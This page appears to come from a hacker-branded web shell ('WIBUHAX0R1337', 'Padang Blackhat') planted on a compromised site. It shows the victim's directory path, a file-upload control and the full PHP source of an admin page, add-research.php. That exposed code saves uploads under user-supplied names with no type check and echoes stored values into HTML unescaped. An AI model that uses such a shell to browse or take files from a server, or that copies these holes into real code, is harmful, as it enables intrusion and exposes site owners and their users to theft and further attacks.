-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
www
/
admin
/
Upload File:
files >> /home/indianstaffing/www/admin/add-research.php
<?php include '../config.php'; include'include/header.php'; include'include/sidebar.php'; // $date = date("Y-m-d"); error_reporting(0); $msg = ''; $heading=$description= ''; if (isset($_GET['id']) && $_GET['id']!="") { $required=""; $id = mysqli_real_escape_string($con, $_GET['id']); $res = mysqli_query($con, "select * from research_doc where id ='$id'"); $check = mysqli_num_rows($res); if ($check>0) { $arr = mysqli_fetch_assoc($res); $category = $arr['category']; $heading = $arr['heading']; $image = $arr['image']; $report = $arr['report']; $description = $arr['description']; $url = $arr['url']; $added_on = $arr['added_on']; }else { header("location: research.php"); } } if (isset($_POST['sldrbtn'])) { if(isset($_GET['id'])){ $id = mysqli_real_escape_string($con, $_GET['id']); } $category = mysqli_real_escape_string($con, $_POST['category']); $heading = mysqli_real_escape_string($con, $_POST['sldrheading']); $description = mysqli_real_escape_string($con, $_POST['description']); $url = mysqli_real_escape_string($con, $_POST['url']); $date = mysqli_real_escape_string($con, $_POST['added_on']); if ($_FILES["image"]["tmp_name"]!="") { $filename = $_FILES["image"]["name"]; $tempname = $_FILES["image"]["tmp_name"]; $folder = "../isf-images/research(new)-img/" . $filename; }else{ $filename = ''; } if ($_FILES["report"]["tmp_name"]!="") { $report_filename =$_FILES["report"]["name"]; $report_tempname = $_FILES["report"]["tmp_name"]; $report_folder = "../isf-images/research(new)-img/" . $report_filename; }else{ $report_filename = ''; } // $date = new date(); $res = mysqli_query($con, "select * from research_doc where heading = '$heading' and id = '$id'"); $check = mysqli_num_rows($res); if ($check>0) { if (isset($_GET['id'])&& $_GET['id']!="") { $getdata=mysqli_fetch_assoc($res); if ($id==$getdata['id']) { }else{ // $msg= "this interview is already exist"; $msg = '<div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> This research is already exist. </div>'; } }else { $msg= '<div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> This research is already exist. </div>'; } } if ($msg=="") { if (isset($_GET['id']) && $_GET['id']!='') { if ($_FILES["image"]["tmp_name"]!="") { move_uploaded_file($tempname, $folder); }else{ $filename = $image; } if ($_FILES["report"]["tmp_name"]!="") { move_uploaded_file($report_tempname, $report_folder); }else{ $report_filename = $report; } $update = "UPDATE `research_doc` SET `heading`='$heading',`category`='$category',`description`='$description',`url`='$url',`image`='$filename',`report`='$report_filename',`added_on`='$date' WHERE id='$id'"; $update_query = mysqli_query($con, $update); if ($update_query) { echo "<script>alert('research update successfully'); window.location.href='research.php';</script>"; } else { echo "<script>alert('research not updated successfully')</script>"; } }else { move_uploaded_file($tempname, $folder); move_uploaded_file($report_tempname, $report_folder); $insertquery = "INSERT INTO `research_doc`(`heading`,`category`, `description`,`url`, `image`,`report`, `added_on`) VALUES ('$heading','$category','$description','$url','$filename','$report_filename','$date')"; $insert_query= mysqli_query($con,$insertquery); if ($insert_query) { echo "<script>alert('research added successfully'); window.location.href='research.php';</script>"; } else { echo "<script>alert('research not added successfully')</script>"; } } echo "<script>window.location.href='research.php';</script>"; die(); } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <div class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <?php if(!empty($id)){ echo "<h1 class='m-0'>Update Research</h1>"; }else{ echo "<h1 class='m-0'>Add Research</h1>"; } ?> </div><!-- /.col --> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> <li class="breadcrumb-item"><a href="<?= $weburl; ?>/index">Home</a></li> <?php if(!empty($id)){ echo "<li class='breadcrumb-item active'>Update Research</li>"; }else{ echo "<li class='breadcrumb-item active'>Add Research</li>"; } ?> </ol> </div><!-- /.col --> </div><!-- /.row --> </div><!-- /.container-fluid --> </div> <!-- /.content-header --> <div class="row"> <div class="col-6 mx-auto"> <form action="" method="POST" enctype='multipart/form-data'> <div class="card-body"> <?php echo $msg; ?> <div class="form-group"> <label>Category</label> <select class="form-control" name="category"> <option>Select Category</option> <?php $sql = mysqli_query($con, "select * from research_cat where status=1"); if (mysqli_num_rows($sql)>0 ) { while($value=mysqli_fetch_assoc($sql)){ ?> <option class="form-control" value="<?=$value['id']?>" <?php if($category==$value['id']){echo "selected";}?> > <?= $value['name'] ?></option> <?php } } ?> </select> </div> <div class="form-group"> <label for="sldrhdname">Heading</label> <input type="text" name="sldrheading" class="form-control" id="sldrhdname" placeholder="Heading" value="<?php echo $heading ?>"> <!-- <small><strong>Note: </strong>Max 35 character is allowed</small> --> </div> <div class="form-group"> <label for="description">Description</label> <textarea type="text" name="description" class="form-control" id="description" placeholder="Description"><?php echo $description; ?></textarea> <!-- <small><strong>Note: </strong>Max 105 character is allowed</small> --> </div> <div class="form-group"> <label for="image">Upload Image</label><br> <input type="file" name="image" id="image"><br> <small><strong>Note: </strong>Image Dimension (370px X 422px)</small><br> <?php if(!empty($image)){ ?> <img style="width:150px;" src="../isf-images/research(new)-img/<?=$image?>" style="width:100px;"> <?php } ?> </div> <div class="form-group"> <label for="image">Upload Brief Report File</label><br> <input type="file" name="report" id="image"><br> <?php if(!empty($image)){ ?> <a href="../isf-images/research(new)-img/<?=$report?>" target="_blank"><img style="width:50px;" src="../assets/images/pdf.png"></a> <?php } ?> </div> <div class="form-group"> <label for="sldrhdname">Detail Report URL</label> <input type="text" name="url" class="form-control" id="sldrhdname" placeholder="URL" value="<?php echo $url ?>"> <!-- <small><strong>Note: </strong>Max 35 character is allowed</small> --> </div> <div class="form-group"> <label for="sldrhdname">Date</label> <input type="date" name="added_on" class="form-control" id="sldrhdname" placeholder="Date" value="<?php echo $added_on ?>"> <!-- <small><strong>Note: </strong>Max 35 character is allowed</small> --> </div> <div> <input type="submit" name="sldrbtn" class="btn btn-primary" value="Submit"> </div> </div> <!-- /.card-body --> </form> </div> </div> </div> <?php include'include/footer.php';?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥